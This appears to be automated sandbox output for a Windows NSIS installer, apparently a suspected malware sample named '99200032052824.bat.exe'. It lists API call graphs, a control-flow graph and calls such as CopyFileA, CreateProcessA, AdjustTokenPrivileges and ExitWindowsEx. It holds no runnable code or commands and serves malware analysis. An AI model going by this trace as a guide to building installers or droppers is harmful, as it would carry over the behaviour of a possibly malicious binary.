4313 405fc2 17 API calls 4312->4313 4314 40404a SetDlgItemTextA 4313->4314 4314->4297 4315->4301 4316->4272 4318 404025 SendMessageA 4317->4318 4319 40401f 4317->4319 4318->4276 4319->4318 4321 404169 4320->4321 4322 4040be GetWindowLongA 4320->4322 4321->4292 4322->4321 4323 4040d3 4322->4323 4323->4321 4324 404100 GetSysColor 4323->4324 4325 404103 4323->4325 4324->4325 4326 404113 SetBkMode 4325->4326 4327 404109 SetTextColor 4325->4327 4328 404131 4326->4328 4329 40412b GetSysColor 4326->4329 4327->4326 4330 404142 4328->4330 4331 404138 SetBkColor 4328->4331 4329->4328 4330->4321 4332 404155 DeleteObject 4330->4332 4333 40415c CreateBrushIndirect 4330->4333 4331->4330 4332->4333 4333->4321 4341 40408b 4334->4341 4336 4051bc 4340 4051e3 4336->4340 4344 401389 4336->4344 4337 40408b SendMessageA 4338 4051f5 OleUninitialize 4337->4338 4340->4337 4342 4040a3 4341->4342 4343 404094 SendMessageA 4341->4343 4342->4336 4343->4342 4346 401390 4344->4346 4345 4013fe 4345->4336 4346->4345 4347 4013cb MulDiv SendMessageA 4346->4347 4347->4346 4358 402688 4359 402904 4358->4359 4360 40268f 4358->4360 4361 402aa9 17 API calls 4360->4361 4362 402696 4361->4362 4363 4026a5 SetFilePointer 4362->4363 4363->4359 4364 4026b5 4363->4364 4366 405efe wsprintfA 4364->4366 4366->4359 5467 401c0a 5468 402aa9 17 API calls 5467->5468 5469 401c11 5468->5469 5470 402aa9 17 API calls 5469->5470 5471 401c1e 5470->5471 5472 402acb 17 API calls 5471->5472 5476 401c33 5471->5476 5472->5476 5473 402acb 17 API calls 5477 401c43 5473->5477 5474 401c9a 5479 402acb 17 API calls 5474->5479 5475 401c4e 5478 402aa9 17 API calls 5475->5478 5476->5473 5476->5477 5477->5474 5477->5475 5480 401c53 5478->5480 5481 401c9f 5479->5481 5482 402aa9 17 API calls 5480->5482 5483 402acb 17 API calls 5481->5483 5484 401c5f 5482->5484 5485 401ca8 FindWindowExA 5483->5485 5486 401c8a SendMessageA 5484->5486 5487 401c6c SendMessageTimeoutA 5484->5487 5488 401cc6 5485->5488 5486->5488 5487->5488 5489 40448a 5490 4044c0 5489->5490 5491 40449a 5489->5491 5492 4040a6 8 API calls 5490->5492 5493 40403f 18 API calls 5491->5493 5495 4044cc 5492->5495 5494 4044a7 SetDlgItemTextA 5493->5494 5494->5490 4467 40320c SetErrorMode GetVersion 4468 40324d 4467->4468 4469 403253 4467->4469 4470 406338 5 API calls 4468->4470 4471 4062ca 3 API calls 4469->4471 4470->4469 4472 403269 lstrlenA 4471->4472 4472->4469 4473 403278 4472->4473 4474 406338 5 API calls 4473->4474 4475 40327f 4474->4475 4476 406338 5 API calls 4475->4476 4477 403286 4476->4477 4478 406338 5 API calls 4477->4478 4479 403292 #17 OleInitialize SHGetFileInfoA 4478->4479 4557 405fa0 lstrcpynA 4479->4557 4482 4032de GetCommandLineA 4558 405fa0 lstrcpynA 4482->4558 4484 4032f0 4485 405963 CharNextA 4484->4485 4486 403319 CharNextA 4485->4486 4495 403329 4486->4495 4487 4033f3 4488 403406 GetTempPathA 4487->4488 4559 4031db 4488->4559 4490 40341e 4492 403422 GetWindowsDirectoryA lstrcatA 4490->4492 4493 403478 DeleteFileA 4490->4493 4491 405963 CharNextA 4491->4495 4496 4031db 12 API calls 4492->4496 4569 402d63 GetTickCount GetModuleFileNameA 4493->4569 4495->4487 4495->4491 4498 4033f5 4495->4498 4497 40343e 4496->4497 4497->4493 4500 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4497->4500 4664 405fa0 lstrcpynA 4498->4664 4499 40348c 4506 405963 CharNextA 4499->4506 4539 403512 4499->4539 4552 403522 4499->4552 4502 4031db 12 API calls 4500->4502 4504 403470 4502->4504 4504->4493 4504->4552 4512 4034a7 4506->4512 4508 40365a 4510 403662 GetCurrentProcess OpenProcessToken 4508->4510 4511 4036dc ExitProcess 4508->4511 4509 40353c 4688 4056bc 4509->4688 4514 4036ad 4510->4514 4515 40367d LookupPrivilegeValueA AdjustTokenPrivileges 4510->4515 4517 403552 4512->4517 4518 4034ed 4512->4518 4522 406338 5 API calls 4514->4522 4515->4514 4653 405627 4517->4653 4665 405a26 4518->4665 4525 4036b4 4522->4525 4528 4036c9 ExitWindowsEx 4525->4528 4531 4036d5 4525->4531 4526 403573 lstrcatA lstrcmpiA 4530 40358f 4526->4530 4526->4552 4527 403568 lstrcatA 4527->4526 4528->4511 4528->4531 4533 403594 4530->4533 4534 40359b 4530->4534 4535 40140b 2 API calls 4531->4535 4532 403507 4680 405fa0 lstrcpynA 4532->4680 4692 40558d CreateDirectoryA 4533->4692 4697 40560a CreateDirectoryA 4534->4697 4535->4511 4597 4037ce 4539->4597 4541 4035a0 SetCurrentDirectoryA 4542 4035ba 4541->4542 4543 4035af 4541->4543 4656 405fa0 lstrcpynA 4542->4656 4700 405fa0 lstrcpynA 4543->4700 4546 405fc2 17 API calls 4547 4035f9 DeleteFileA 4546->4547 4548 403606 CopyFileA 4547->4548 4554 4035c8 4547->4554 4548->4554 4549 40364e 4551 405d7f 36 API calls 4549->4551 4551->4552 4681 4036f4 4552->4681 4553 405fc2 17 API calls 4553->4554 4554->4546 4554->4549 4554->4553 4556 40363a CloseHandle 4554->4556 4657 405d7f MoveFileExA 4554->4657 4661 40563f CreateProcessA 4554->4661 4556->4554 4557->4482 4558->4484 4560 40620a 5 API calls 4559->4560 4562 4031e7 4560->4562 4561 4031f1 4561->4490 4562->4561 4701 405938 lstrlenA CharPrevA 4562->4701 4565 40560a 2 API calls 4566 4031ff 4565->4566 4567 405b68 2 API calls 4566->4567 4568 40320a 4567->4568 4568->4490 4704 405b39 GetFileAttributesA CreateFileA 4569->4704 4571 402da3 4572 402db3 4571->4572 4705 405fa0 lstrcpynA 4571->4705 4572->4499 4574 402dc9 4706 40597f lstrlenA 4574->4706 4578 402dda GetFileSize 4579 402df1 4578->4579 4594 402ed6 4578->4594 4579->4572 4584 402f42 4579->4584 4593 402cff 6 API calls 4579->4593 4579->4594 4743 4031ae 4579->4743 4581 402edf 4581->4572 4583 402f0f GlobalAlloc 4581->4583 4746 4031c4 SetFilePointer 4581->4746 4722 4031c4 SetFilePointer 4583->4722 4589 402cff 6 API calls 4584->4589 4587 402ef8 4590 4031ae ReadFile 4587->4590 4588 402f2a 4723 402f9c 4588->4723 4589->4572 4592 402f03 4590->4592 4592->4572 4592->4583 4593->4579 4711 402cff 4594->4711 4595 402f36 4595->4572 4595->4595 4596 402f73 SetFilePointer 4595->4596 4596->4572 4598 406338 5 API calls 4597->4598 4599 4037e2 4598->4599 4600 4037e8 4599->4600 4601 4037fa 4599->4601 4762 405efe wsprintfA 4600->4762 4602 405e87 3 API calls 4601->4602 4603 403825 4602->4603 4605 403843 lstrcatA 4603->4605 4607 405e87 3 API calls 4603->4607 4606 4037f8 4605->4606 4754 403a93 4606->4754 4607->4605 4610 405a26 18 API calls 4611 403875 4610->4611 4612 4038fe 4611->4612 4614 405e87 3 API calls 4611->4614 4613 405a26 18 API calls 4612->4613 4615 403904 4613->4615 4616 4038a1 4614->4616 4617 403914 LoadImageA 4615->4617 4618 405fc2 17 API calls 4615->4618 4616->4612 4621 4038bd lstrlenA 4616->4621 4625 405963 CharNextA 4616->4625 4619 4039ba 4617->4619 4620 40393b RegisterClassA 4617->4620 4618->4617 4624 40140b 2 API calls 4619->4624 4622 403971 SystemParametersInfoA CreateWindowExA 4620->4622 4623 4039c4 4620->4623 4626 4038f1 4621->4626 4627 4038cb lstrcmpiA 4621->4627 4622->4619 4623->4552 4628 4039c0 4624->4628 4629 4038bb 4625->4629 4631 405938 3 API calls 4626->4631 4627->4626 4630 4038db GetFileAttributesA 4627->4630 4628->4623 4633 403a93 18 API calls 4628->4633 4629->4621 4632 4038e7 4630->4632 4634 4038f7 4631->4634 4632->4626 4635 40597f 2 API calls 4632->4635 4636 4039d1 4633->4636 4763 405fa0 lstrcpynA 4634->4763 4635->4626 4638 403a60 4636->4638 4639 4039dd ShowWindow 4636->4639 4641 405199 5 API calls 4638->4641 4640 4062ca 3 API calls 4639->4640 4642 4039f5 4640->4642 4643 403a66 4641->4643 4644 403a03 GetClassInfoA 4642->4644 4647 4062ca 3 API calls 4642->4647 4645 403a82 4643->4645 4646 403a6a 4643->4646 4649 403a17 GetClassInfoA RegisterClassA 4644->4649 4650 403a2d DialogBoxParamA 4644->4650 4648 40140b 2 API calls 4645->4648 4646->4623 4651 40140b 2 API calls 4646->4651 4647->4644 4648->4623 4649->4650 4652 40140b 2 API calls 4650->4652 4651->4623 4652->4623 4654 406338 5 API calls 4653->4654 4655 403557 lstrcatA 4654->4655 4655->4526 4655->4527 4656->4554 4658 405da0 4657->4658 4659 405d93 4657->4659 4658->4554 4765 405c0f 4659->4765 4662 405672 CloseHandle 4661->4662 4663 40567e 4661->4663 4662->4663 4663->4554 4664->4488 4799 405fa0 lstrcpynA 4665->4799 4667 405a37 4800 4059d1 CharNextA CharNextA 4667->4800 4670 4034f8 4670->4552 4679 405fa0 lstrcpynA 4670->4679 4671 40620a 5 API calls 4677 405a4d 4671->4677 4672 405a78 lstrlenA 4673 405a83 4672->4673 4672->4677 4674 405938 3 API calls 4673->4674 4676 405a88 GetFileAttributesA 4674->4676 4676->4670 4677->4670 4677->4672 4678 40597f 2 API calls 4677->4678 4806 4062a3 FindFirstFileA 4677->4806 4678->4672 4679->4532 4680->4539 4682 40370c 4681->4682 4683 4036fe CloseHandle 4681->4683 4809 403739 4682->4809 4683->4682 4689 4056d1 4688->4689 4690 40354a ExitProcess 4689->4690 4691 4056e5 MessageBoxIndirectA 4689->4691 4691->4690 4693 403599 4692->4693 4694 4055de GetLastError 4692->4694 4693->4541 4694->4693 4695 4055ed SetFileSecurityA 4694->4695 4695->4693 4696 405603 GetLastError 4695->4696 4696->4693 4698 40561a 4697->4698 4699 40561e GetLastError 4697->4699 4698->4541 4699->4698 4700->4542 4702 405952 lstrcatA 4701->4702 4703 4031f9 4701->4703 4702->4703 4703->4565 4704->4571 4705->4574 4707 40598c 4706->4707 4708 405991 CharPrevA 4707->4708 4709 402dcf 4707->4709 4708->4707 4708->4709 4710 405fa0 lstrcpynA 4709->4710 4710->4578 4712 402d20 4711->4712 4713 402d08 4711->4713 4716 402d30 GetTickCount 4712->4716 4717 402d28 4712->4717 4714 402d11 DestroyWindow 4713->4714 4715 402d18 4713->4715 4714->4715 4715->4581 4718 402d61 4716->4718 4719 402d3e CreateDialogParamA ShowWindow 4716->4719 4747 406374 4717->4747 4718->4581 4719->4718 4722->4588 4725 402fb2 4723->4725 4724 402fe0 4726 4031ae ReadFile 4724->4726 4725->4724 4753 4031c4 SetFilePointer 4725->4753 4728 402feb 4726->4728 4729 403147 4728->4729 4730 402ffd GetTickCount 4728->4730 4732 403131 4728->4732 4731 403189 4729->4731 4736 40314b 4729->4736 4730->4732 4739 40304c 4730->4739 4733 4031ae ReadFile 4731->4733 4732->4595 4733->4732 4734 4031ae ReadFile 4734->4739 4735 4031ae ReadFile 4735->4736 4736->4732 4736->4735 4737 405be0 WriteFile 4736->4737 4737->4736 4738 4030a2 GetTickCount 4738->4739 4739->4732 4739->4734 4739->4738 4740 4030c7 MulDiv wsprintfA 4739->4740 4751 405be0 WriteFile 4739->4751 4741 4050c7 24 API calls 4740->4741 4741->4739 4744 405bb1 ReadFile 4743->4744 4745 4031c1 4744->4745 4745->4579 4746->4587 4748 406391 PeekMessageA 4747->4748 4749 402d2e 4748->4749 4750 406387 DispatchMessageA 4748->4750 4749->4581 4750->4748 4752 405bfe 4751->4752 4752->4739 4753->4724 4755 403aa7 4754->4755 4764 405efe wsprintfA 4755->4764 4757 403b18 4758 403b4c 18 API calls 4757->4758 4760 403b1d 4758->4760 4759 403853 4759->4610 4760->4759 4761 405fc2 17 API calls 4760->4761 4761->4760 4762->4606 4763->4612 4764->4757 4766 405c35 4765->4766 4767 405c5b GetShortPathNameA 4765->4767 4792 405b39 GetFileAttributesA CreateFileA 4766->4792 4769 405c70 4767->4769 4770 405d7a 4767->4770 4769->4770 4772 405c78 wsprintfA 4769->4772 4770->4658 4771 405c3f CloseHandle GetShortPathNameA 4771->4770 4773 405c53 4771->4773 4774 405fc2 17 API calls 4772->4774 4773->4767 4773->4770 4775 405ca0 4774->4775 4793 405b39 GetFileAttributesA CreateFileA 4775->4793 4777 405cad 4777->4770 4778 405cbc GetFileSize GlobalAlloc 4777->4778 4779 405d73 CloseHandle 4778->4779 4780 405cde 4778->4780 4779->4770 4781 405bb1 ReadFile 4780->4781 4782 405ce6 4781->4782 4782->4779 4794 405a9e lstrlenA 4782->4794 4785 405d11 4787 405a9e 4 API calls 4785->4787 4786 405cfd lstrcpyA 4788 405d1f 4786->4788 4787->4788 4789 405d56 SetFilePointer 4788->4789 4790 405be0 WriteFile 4789->4790 4791 405d6c GlobalFree 4790->4791 4791->4779 4792->4771 4793->4777 4795 405adf lstrlenA 4794->4795 4796 405ae7 4795->4796 4797 405ab8 lstrcmpiA 4795->4797 4796->4785 4796->4786 4797->4796 4798 405ad6 CharNextA 4797->4798 4798->4795 4799->4667 4801 4059ec 4800->4801 4805 4059fc 4800->4805 4803 4059f7 CharNextA 4801->4803 4801->4805 4802 405a1c 4802->4670 4802->4671 4803->4802 4804 405963 CharNextA 4804->4805 4805->4802 4805->4804 4807 4062c4 4806->4807 4808 4062b9 FindClose 4806->4808 4807->4677 4808->4807 4810 403747 4809->4810 4811 403711 4810->4811 4812 40374c FreeLibrary GlobalFree 4810->4812 4813 405768 4811->4813 4812->4811 4812->4812 4814 405a26 18 API calls 4813->4814 4815 405788 4814->4815 4816 405790 DeleteFileA 4815->4816 4817 4057a7 4815->4817 4818 40352b OleUninitialize 4816->4818 4819 4058df 4817->4819 4854 405fa0 lstrcpynA 4817->4854 4818->4508 4818->4509 4819->4818 4824 4062a3 2 API calls 4819->4824 4821 4057cd 4822 4057e0 4821->4822 4823 4057d3 lstrcatA 4821->4823 4826 40597f 2 API calls 4822->4826 4825 4057e6 4823->4825 4827 4058f9 4824->4827 4828 4057f4 lstrcatA 4825->4828 4829 4057eb 4825->4829 4826->4825 4827->4818 4830 4058fd 4827->4830 4831 4057ff lstrlenA FindFirstFileA 4828->4831 4829->4828 4829->4831 4832 405938 3 API calls 4830->4832 4833 4058d5 4831->4833 4852 405823 4831->4852 4834 405903 4832->4834 4833->4819 4836 405720 5 API calls 4834->4836 4835 405963 CharNextA 4835->4852 4837 40590f 4836->4837 4838 405913 4837->4838 4839 405929 4837->4839 4838->4818 4844 4050c7 24 API calls 4838->4844 4842 4050c7 24 API calls 4839->4842 4840 4058b4 FindNextFileA 4843 4058cc FindClose 4840->4843 4840->4852 4842->4818 4843->4833 4845 405920 4844->4845 4846 405d7f 36 API calls 4845->4846 4849 405927 4846->4849 4848 405768 60 API calls 4848->4852 4849->4818 4850 4050c7 24 API calls 4850->4840 4851 4050c7 24 API calls 4851->4852 4852->4835 4852->4840 4852->4848 4852->4850 4852->4851 4853 405d7f 36 API calls 4852->4853 4855 405fa0 lstrcpynA 4852->4855 4856 405720 4852->4856 4853->4852 4854->4821 4855->4852 4864 405b14 GetFileAttributesA 4856->4864 4859 40574d 4859->4852 4860 405743 DeleteFileA 4862 405749 4860->4862 4861 40573b RemoveDirectoryA 4861->4862 4862->4859 4863 405759 SetFileAttributesA 4862->4863 4863->4859 4865 40572c 4864->4865 4866 405b26 SetFileAttributesA 4864->4866 4865->4859 4865->4860 4865->4861 4866->4865 5496 40378c 5497 403797 5496->5497 5498 40379e GlobalAlloc 5497->5498 5499 40379b 5497->5499 5498->5499 5500 401490 5501 4050c7 24 API calls 5500->5501 5502 401497 5501->5502 5503 401d9b GetDC 5504 402aa9 17 API calls 5503->5504 5505 401dad GetDeviceCaps MulDiv ReleaseDC 5504->5505 5506 402aa9 17 API calls 5505->5506 5507 401dde 5506->5507 5508 405fc2 17 API calls 5507->5508 5509 401e1b CreateFontIndirectA 5508->5509 5510 40257d 5509->5510 5511 40149d 5512 4022e7 5511->5512 5513 4014ab PostQuitMessage 5511->5513 5513->5512 5514 40159d 5515 402acb 17 API calls 5514->5515 5516 4015a4 SetFileAttributesA 5515->5516 5517 4015b6 5516->5517 5518 401a1e 5519 402acb 17 API calls 5518->5519 5520 401a27 ExpandEnvironmentStringsA 5519->5520 5521 401a3b 5520->5521 5523 401a4e 5520->5523 5522 401a40 lstrcmpA 5521->5522 5521->5523 5522->5523 5529 40171f 5530 402acb 17 API calls 5529->5530 5531 401726 SearchPathA 5530->5531 5532 401741 5531->5532 5533 401d20 5534 402aa9 17 API calls 5533->5534 5535 401d2e SetWindowLongA 5534->5535 5536 402957 5535->5536 5537 404822 5538 404832 5537->5538 5539 40484e 5537->5539 5548 4056a0 GetDlgItemTextA 5538->5548 5540 404881 5539->5540 5541 404854 SHGetPathFromIDListA 5539->5541 5543 40486b SendMessageA 5541->5543 5544 404864 5541->5544 5543->5540 5546 40140b 2 API calls 5544->5546 5545 40483f SendMessageA 5545->5539 5546->5543 5548->5545 5549 4041aa 5550 4041c0 5549->5550 5555 4042cc 5549->5555 5553 40403f 18 API calls 5550->5553 5551 40433b 5552 404405 5551->5552 5554 404345 GetDlgItem 5551->5554 5560 4040a6 8 API calls 5552->5560 5556 404216 5553->5556 5557 4043c3 5554->5557 5561 40435b 5554->5561 5555->5551 5555->5552 5558 404310 GetDlgItem SendMessageA 5555->5558 5559 40403f 18 API calls 5556->5559 5557->5552 5562 4043d5 5557->5562 5582 404061 KiUserCallbackDispatcher 5558->5582 5564 404223 CheckDlgButton 5559->5564 5565 404400 5560->5565 5561->5557 5566 404381 SendMessageA LoadCursorA SetCursor 5561->5566 5568 4043db SendMessageA 5562->5568 5569 4043ec 5562->5569 5580 404061 KiUserCallbackDispatcher 5564->5580 5583 40444e 5566->5583 5568->5569 5569->5565 5573 4043f2 SendMessageA 5569->5573 5570 404336 5574 40442a SendMessageA 5570->5574 5573->5565 5574->5551 5575 404241 GetDlgItem 5581 404074 SendMessageA 5575->5581 5577 404257 SendMessageA 5578 404275 GetSysColor 5577->5578 5579 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5577->5579 5578->5579 5579->5565 5580->5575 5581->5577 5582->5570 5586 405682 ShellExecuteExA 5583->5586 5585 4043b4 LoadCursorA SetCursor 5585->5557 5586->5585 4459 401e2b 4460 402aa9 17 API calls 4459->4460 4461 401e31 4460->4461 4462 402aa9 17 API calls 4461->4462 4463 401e3d 4462->4463 4464 401e54 EnableWindow 4463->4464 4465 401e49 ShowWindow 4463->4465 4466 402957 4464->4466 4465->4466 5587 4063ad WaitForSingleObject 5588 4063c7 5587->5588 5589 4063d9 GetExitCodeProcess 5588->5589 5590 406374 2 API calls 5588->5590 5591 4063ce WaitForSingleObject 5590->5591 5591->5588 5592 401f31 5593 402acb 17 API calls 5592->5593 5594 401f38 5593->5594 5595 4062a3 2 API calls 5594->5595 5596 401f3e 5595->5596 5598 401f50 5596->5598 5599 405efe wsprintfA 5596->5599 5599->5598 5600 73a315d1 5601 73a314bb GlobalFree 5600->5601 5603 73a315e9 5601->5603 5602 73a3162f GlobalFree 5603->5602 5604 73a31604 5603->5604 5605 73a3161b VirtualFree 5603->5605 5604->5602 5605->5602 5606 402932 SendMessageA 5607 402957 5606->5607 5608 40294c InvalidateRect 5606->5608 5608->5607 5609 4014b7 5610 4014bd 5609->5610 5611 401389 2 API calls 5610->5611 5612 4014c5 5611->5612 5613 4026ba 5614 4026c0 5613->5614 5615 4026c8 FindClose 5614->5615 5616 402957 5614->5616 5615->5616 4980 4015bb 4981 402acb 17 API calls 4980->4981 4982 4015c2 4981->4982 4983 4059d1 4 API calls 4982->4983 4996 4015ca 4983->4996 4984 401624 4986 401652 4984->4986 4987 401629 4984->4987 4985 405963 CharNextA 4985->4996 4989 401423 24 API calls 4986->4989 4988 401423 24 API calls 4987->4988 4990 401630 4988->4990 4994 40164a 4989->4994 4999 405fa0 lstrcpynA 4990->4999 4991 40560a 2 API calls 4991->4996 4993 40163b SetCurrentDirectoryA 4993->4994 4995 405627 5 API calls 4995->4996 4996->4984 4996->4985 4996->4991 4996->4995 4997 40160c GetFileAttributesA 4996->4997 4998 40558d 4 API calls 4996->4998 4997->4996 4998->4996 4999->4993 5617 40503b 5618 40504b 5617->5618 5619 40505f 5617->5619 5622 405051 5618->5622 5629 4050a8 5618->5629 5620 40507e 5619->5620 5621 405067 IsWindowVisible 5619->5621 5624 4050ad CallWindowProcA 5620->5624 5628 404a12 4 API calls 5620->5628 5623 405074 5621->5623 5621->5629 5625 40408b SendMessageA 5622->5625 5626 404992 5 API calls 5623->5626 5627 40505b 5624->5627 5625->5627 5626->5620 5628->5629 5629->5624 5630 4016bb 5631 402acb 17 API calls 5630->5631 5632 4016c1 GetFullPathNameA 5631->5632 5633 4016d8 5632->5633 5639 4016f9 5632->5639 5636 4062a3 2 API calls 5633->5636 5633->5639 5634 402957 5635 40170d GetShortPathNameA 5635->5634 5637 4016e9 5636->5637 5637->5639 5640 405fa0 lstrcpynA 5637->5640 5639->5634 5639->5635 5640->5639 5641 73a31058 5643 73a31074 5641->5643 5642 73a310dc 5643->5642 5644 73a314bb GlobalFree 5643->5644 5645 73a31091 5643->5645 5644->5645 5646 73a314bb GlobalFree 5645->5646 5647 73a310a1 5646->5647 5648 73a310b1 5647->5648 5649 73a310a8 GlobalSize 5647->5649 5650 73a310c6 5648->5650 5651 73a310b5 GlobalAlloc 5648->5651 5649->5648 5653 73a310d1 GlobalFree 5650->5653 5652 73a314e2 3 API calls 5651->5652 5652->5650 5653->5642 5654 40273c 5655 402acb 17 API calls 5654->5655 5657 40274a 5655->5657 5656 402760 5659 405b14 2 API calls 5656->5659 5657->5656 5658 402acb 17 API calls 5657->5658 5658->5656 5660 402766 5659->5660 5682 405b39 GetFileAttributesA CreateFileA 5660->5682 5662 402773 5663 40281c 5662->5663 5664 40277f GlobalAlloc 5662->5664 5667 402824 DeleteFileA 5663->5667 5668 402837 5663->5668 5665 402813 CloseHandle 5664->5665 5666 402798 5664->5666 5665->5663 5683 4031c4 SetFilePointer 5666->5683 5667->5668 5670 40279e 5671 4031ae ReadFile 5670->5671 5672 4027a7 GlobalAlloc 5671->5672 5673 4027f1 5672->5673 5674 4027b7 5672->5674 5675 405be0 WriteFile 5673->5675 5676 402f9c 31 API calls 5674->5676 5677 4027fd GlobalFree 5675->5677 5678 4027c4 5676->5678 5679 402f9c 31 API calls 5677->5679 5680 4027e8 GlobalFree 5678->5680 5681 402810 5679->5681 5680->5673 5681->5665 5682->5662 5683->5670 5684 401b3f 5685 402acb 17 API calls 5684->5685 5686 401b46 5685->5686 5687 402aa9 17 API calls 5686->5687 5688 401b4f wsprintfA 5687->5688 5689 402957 5688->5689

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 8 403257 1->8 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 8->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 56 4033e8 37->56 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 58 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->58 59 403526-403536 call 4036f4 OleUninitialize 44->59 60 403498-40349e 44->60 47->42 47->48 48->42 52 4033a0-4033a2 49->52 53 4033a4 49->53 50->37 55 4033f5-403401 call 405fa0 50->55 52->50 52->53 53->50 55->33 56->28 58->44 58->59 72 40365a-403660 59->72 73 40353c-40354c call 4056bc ExitProcess 59->73 63 4034a0-4034ab call 405963 60->63 64 403516-40351d call 4037ce 60->64 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 70 403522 64->70 70->59 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 79 4036ad-4036bb call 406338 74->79 80 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4036e6 75->82 83 4036ea-4036ee ExitProcess 75->83 84 403552-403566 call 405627 lstrcatA 76->84 85 4034ed-4034fa call 405a26 76->85 81 4034d8-4034da 77->81 97 4036c9-4036d3 ExitWindowsEx 79->97 98 4036bd-4036c7 79->98 80->79 81->76 90 4034dc-4034df 81->90 82->83 95 403573-40358d lstrcatA lstrcmpiA 84->95 96 403568-40356e lstrcatA 84->96 85->59 94 4034fc-403512 call 405fa0 * 2 85->94 90->76 90->81 94->64 95->59 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403631 call 405d7f call 405fc2 call 40563f 122->123 132 403636-403638 123->132 124->59 132->121 133 40363a-403641 CloseHandle 132->133 133->121
                            APIs
                            • SetErrorMode.KERNELBASE ref: 00403231
                            • GetVersion.KERNEL32 ref: 00403237
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                            • OleInitialize.OLE32(00000000), ref: 004032AD
                            • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                            • GetCommandLineA.KERNEL32(Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",00000020,"C:\Users\user\Desktop\99200032052824.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
                            • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D
                              • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • Part of subcall function 004037CE: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410), ref: 004038BE
                              • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                              • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Call), ref: 004038DC
                              • Part of subcall function 004037CE: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925
                              • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                              • Part of subcall function 004036F4: CloseHandle.KERNEL32(000002F4,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                            • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                            • ExitProcess.KERNEL32 ref: 0040354C
                            • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                            • ExitProcess.KERNEL32 ref: 004036EE
